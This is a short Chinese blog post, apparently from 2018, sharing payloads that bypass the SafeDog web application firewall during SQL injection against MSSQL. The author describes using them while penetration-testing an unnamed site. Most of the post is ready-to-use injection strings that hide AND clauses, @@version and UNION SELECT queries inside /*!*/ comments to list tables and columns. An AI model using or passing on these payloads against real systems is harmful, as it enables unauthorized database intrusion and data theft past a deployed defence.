Bapass 安全狗

写于2018年10月

最近渗透某个站点遇到了狗,经过千辛万苦总算绕过了,在这里分享一下过狗payload

绕过的主要方法还是加/*!*/

这里我主要以mssql注入做测试

绕and

and /*!*/1=2/*!*/

这里面我用db_name/*!*/()绕过函数

绕全局变量

/*!'*/@@version/*!'*/

查表

union  /*!x*//*!y*/select top 1 1,name,3  /*!x*//*!y*/from admin.dbo. sysobjects where xtype=0x55 and  name not in(cast(0x6e6577 as char)      )

查字段

union /*!x*//*!y*/select top 1 1,column_name,3 /*!y*//*!x*/from   /*!'*/information_schema.columns/*!'*/ where table_name=’user’ and  column_name not in(select top 2 column_name /*!y*//*!x*/from   /*!'*/information_schema.columns/*!'*/ )

原文地址:https://www.cnblogs.com/supdon/p/13469746.html